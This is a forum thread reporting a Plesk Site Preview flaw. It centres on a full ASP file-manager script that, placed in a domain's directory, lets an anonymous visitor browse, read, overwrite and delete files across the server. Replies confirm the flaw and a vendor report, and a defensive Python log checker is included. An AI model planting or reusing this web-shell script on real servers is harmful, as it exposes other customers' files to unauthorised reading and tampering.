
Site before propagate: BUG SECURITY ?


DanivalBrazil

Guest
Hi!

Copy the ASP script below and paste it into a file (index.asp). Access it by the IP address, like: http://xx.xx.xx.xx/your-domain.com/index.asp .


Code:
<%@ language="vbscript" %>
<% Option Explicit %>
<object runat="server" scope="page" id="fsoEdit"
progid="Scripting.FileSystemObject">
</object>

<%
	Const STR_DIR_GIF = "se_folder.gif"
	Const STR_UNK_GIF = "se_unknown.gif"
	Const DET_NAME = 0
	Const DET_SIZE = 1
	Const DET_DATE = 2
	
	Const DET_NAME_COLS = 3
	
	Dim strSERoot
	strSERoot = Server.MapPath("/")
	
	Dim strSEScript
	strSEScript = Request.ServerVariables("SCRIPT_NAME")

	Function GetParm(strName)
		If IsEmpty(Request.Form(strName)) Then
			GetParm = Request.QueryString(strName)
		Else
			GetParm = Request.Form(strName)
		End If
	End Function
	
	Function GetFileGIFName(strFName)
		Dim strGif
		
		strGif = "se_" + Trim(fsoEdit.GetExtensionName(strFName)) + ".gif"
		
		If Not fsoEdit.FileExists(strSERoot + "\" + strGif) Then
			GetFileGIFName = STR_UNK_GIF
		Else
			GetFileGIFName = strGif
		End If
	End Function
	
	Function MakeIconImg(strFName)
		MakeIconImg = "<img height=""16"" width=""16"" src=""" + strFName + """>"
	End Function

	Function CanEdit(fileCur)
		Select Case fsoEdit.GetExtensionName(fileCur.Name)
		Case "asp", "inc", "txt", "html", "htm" , "shtml", "cgi", "asa", "pl", "shtm", "php", "ASP", "PHP", "sql", "aspx", "ASPX"
			CanEdit = True
		Case Else
			CanEdit = False
		End Select
	End Function

	Function MakeDirLink(fld, strDir)
		If strDir = ".." Then
			MakeDirLink = "<a href=""" + strSEScript + "?CWD=" + Server.URLEncode(fld.ParentFolder) + """>" + strDir + "</a>"
		Else
			MakeDirLink = "<a href=""" + strSEScript + "?CWD=" + Server.URLEncode(fsoEdit.BuildPath(fld.Path, strDir)) + """>" + strDir + "</a>"
		End If
	End Function
	
	Function MakeFileLink(fileCur)
		If CanEdit(fileCur) Then
			MakeFileLink = "<a href=""" + strSEScript + "?File=" + Server.URLEncode(fileCur.Path) + """>" + fileCur.Name + "</a>"
		Else
			MakeFileLink = fileCur.Name
		End If
	End Function
	
	Function ShowDirList(strPath, iDetail)
		Dim fld
		
		Set fld = fsoEdit.GetFolder(strPath)
		
		Dim strOut
		strOut = ""
		If Not fld.IsRootFolder Then
			strOut = "<tr><td>" + MakeIconImg(STR_DIR_GIF) + "&nbsp;" + MakeDirLink(fld, "..") + "</td></tr>" + vbCR
		End If
		
		Dim iCur
		iCur = 0
		
		Dim dirCur
		
		For Each dirCur In fld.SubFolders
			Select Case iDetail
			Case DET_NAME
				If strOut = "" Then
					strOut = "<tr>"
				End If
				strOut = strOut + "<td>" + MakeIconImg(STR_DIR_GIF) + "&nbsp;" + MakeDirLink(fld, dirCur.Name) + "</td>"
				iCur = iCur + 1
				If iCur Mod DET_NAME_COLS = 0 Then
					strOut = strOut + "</tr>" + vbCR + "<tr>"
				End If
			End Select
		Next

		Dim fileCur
		For Each fileCur In fld.Files
			Select Case iDetail
			Case DET_NAME
				If strOut = "" Then
					strOut = "<tr>"
				End If
				strOut = strOut + "<td>" + MakeIconImg(GetFileGIFName(fileCur.Name)) + "&nbsp;" + MakeFileLink(fileCur) + "</td>"
				iCur = iCur + 1
				If iCur Mod DET_NAME_COLS = 0 Then
					strOut = strOut + "</tr>" + vbCR + "<tr>"
				End If
			End Select
		Next
			
		If strOut <> "" Then
			strOut = strOut + "</tr>" + vbCR
		End If
				
		ShowDirList = strOut
	End Function

	Sub BackupFile(strFName)
		Dim strBFName
		strBFName = strFName + ".BAK"
		
		If Not fsoEdit.FileExists(strFName) Then
			Exit Sub
		End If
		
		If fsoEdit.FileExists(strBFName) Then
			fsoEdit.DeleteFile strBFName, True
		End If
		
		fsoEdit.CopyFile strFName, strBFName, True
		
		fsoEdit.DeleteFile strFName, True
	End Sub
	
	Sub SaveTextFile(strFName, strText)
		Dim ts
		Set ts = fsoEdit.CreateTextFile(strFName, True)
		
		ts.Write strText
		
		ts.Close
		Set ts = Nothing
	End Sub
	
	Dim strFName
	strFName = GetParm("File")
	
	Dim fEditing
	fEditing = False
	
	Dim fileEdit
	
	Dim strAct
	strAct = GetParm("btnAction")
	If Not IsEmpty(strAct) Then
		Dim strOFName
		
		If IsEmpty(GetParm("OrgFName")) Then
			strOFName = strFName
		Else
			strOFName = fsoEdit.BuildPath(GetParm("CWD"), GetParm("OrgFName"))			
		End If
		
		If Not IsEmpty(GetParm("CWD")) Then
			strFName = fsoEdit.BuildPath(GetParm("CWD"), strFName)
		End If
					
		Select Case strAct
		Case "Save"
			If strOFName <> strFName Then
				' rename operation
				If fsoEdit.FileExists(strOFName) Then
					BackupFile strOFName
					fsoEdit.DeleteFile strOFName
				End If
			End If
			BackupFile strFName
			SaveTextFile strFName, GetParm("txtEdit")
		Case "Save As"
			BackupFile strFName
			SaveTextFile strFName, GetParm("txtEdit")
		Case "Delete"
		End Select
	End If
			
	If Not IsEmpty(strFName) Then
		If fsoEdit.FileExists(strFName) Then
			fEditing = True
			Set fileEdit = fsoEdit.GetFile(strFName)
		Else
			strFName = Empty
		End If
	End If
	
	Dim strCWD
	
	strCWD = GetParm("CWD")
	If IsEmpty(strCWD) Then
		If Not IsEmpty(strFName) Then
			strCWD = fsoEdit.GetParentFolderName(strFName)
		Else
			strCWD = strSERoot
		End If
	End If
%>

<html>

<head>
<title>C0BR4S - <%=strCWD%></title>
</head>
<body>
<h1>Editar Site</h1>
<%
	If Not fEditing Then
%>
<h3>Diret&oacute;rio <%=strCWD%></h3>
<table>
<%=ShowDirList(strCWD, DET_NAME)%>
</table>
<%
	Else
%>
<form method="post" action="<%=strSEScript%>">
<input type="hidden" name="CWD" value="<%=fileEdit.ParentFolder%>">
<input type="hidden" name="OrgFName" value="<%=fileEdit.Name%>">
  <h3>Arquivo 
    <input type="text" name="File" value="<%=fileEdit.Name%>"></h3>
<p><%=MakeIconImg(STR_DIR_GIF)%>&nbsp;<%=MakeDirLink(fileEdit, "..")%></p>
<table border="1">
	<tr>
		<td><textarea cols="80" rows="20" name="txtEdit"><%
	Dim ts
	Set ts = fileEdit.OpenAsTextStream()
	Dim strLine
	
	While Not ts.AtEndOfStream
		strLine = ts.ReadLine
		Response.Write Server.HTMLEncode(strLine) + vbCr
	Wend
	
	ts.Close
	Set ts = Nothing
%></textarea></td>
	</tr>
	<tr>
		<td>
        <input type="submit" name="btnAction" value="Salvar">
        &nbsp;
        <input type="submit" name="btnAction" value="Salvar como">
        &nbsp;
        <input type="submit" name="btnAction" value="Apagar">
        &nbsp;<input type="reset" name="btnAction"></td>
	</tr>
</table>
</form>
<%
	End If
%>
</body>
</html>

Browse in the server!!!

How do I fix it???



Danival - from Brazil
 
I think you have wrong permissions...
I can browse only the domain with this script, not the server.
 
I see the problem and I maybe can help explain in English.

If you put this file into a domain's httpdocs directory then view the file through the Site Preview tool, you can use the posted ASP script to delve down into the filesystem of the server itself.

I put this on our test server and was able to navigate down to the root of the partition I have Plesk and the customer domains on. I could read files that an anonymous user had absolutely no business reading.

And I did it all through an anonymous connection.

Next I plan on testing this with Plesk 7.5. I'll report here if I find that the problem carries over.

Thank you for discovering this Danival. I'm going to report this to SW-Soft today along with another exploit I found in Plesk 7.5. I'm not going to go into that one though since I believe disclosing exploits should be done to the software vendor first before giving it to the general public.
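An added example, not part of any post in this thread: a log check for the behaviour described above, where the script's `CWD` and `File` query parameters carry absolute paths that leave the domain's own directory. The site root, host names and log lines are constructed assumptions; the field layout follows the IIS W3C extended format.

```python
"""Flag IIS W3C log entries whose query string names a path outside the site root."""
import ntpath
from urllib.parse import parse_qsl

# Assumption: document root of the domain being checked; adjust per site.
SITE_ROOT = r"C:\Inetpub\vhosts\example.com\httpdocs"

# Constructed sample log, not taken from a real server.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-11-02 10:01:07 203.0.113.5 GET /example.com/index.asp - 200
2004-11-02 10:01:15 203.0.113.5 GET /example.com/index.asp CWD=C%3A%5CInetpub%5Cvhosts%5Cexample.com%5Chttpdocs%5Cimages 200
2004-11-02 10:01:22 203.0.113.5 GET /example.com/index.asp CWD=C%3A%5CInetpub%5Cvhosts 200
2004-11-02 10:01:40 203.0.113.5 GET /example.com/index.asp File=C%3A%5CInetpub%5Cvhosts%5Cother.example%5Chttpdocs%5Cdb.inc 200
2004-11-02 10:02:03 198.51.100.9 GET /example.com/search.asp q=c%3A+drive+full 200
"""

def is_absolute_windows_path(value):
    """True for drive-letter or UNC absolute paths."""
    drive, rest = ntpath.splitdrive(value)
    return bool(drive) and rest.startswith(("\\", "/"))

def outside_root(path, root=SITE_ROOT):
    """Compare normalized, case-folded paths; '..' segments are collapsed first."""
    norm = ntpath.normcase(ntpath.normpath(path))
    base = ntpath.normcase(ntpath.normpath(root))
    return not (norm == base or norm.startswith(base + "\\"))

def suspicious_requests(log_text, root=SITE_ROOT):
    """Return (time, client, stem, param, path) for each out-of-root path parameter."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        if query == "-":
            continue
        for name, value in parse_qsl(query, keep_blank_values=True):
            if is_absolute_windows_path(value) and outside_root(value, root):
                hits.append((row["time"], row["c-ip"], row["cs-uri-stem"], name, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit)
```

The script's form posts carry `CWD` and `File` in the request body, so save actions do not show up in `cs-uri-query`; only the directory and file links do.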
 
Thanks Mertz,

It is a bug in 7.03 only. I hope for a bugfix for this version, because 7.5 has a lot of bugs...

Thanks for the explanation, my English is horrible...
 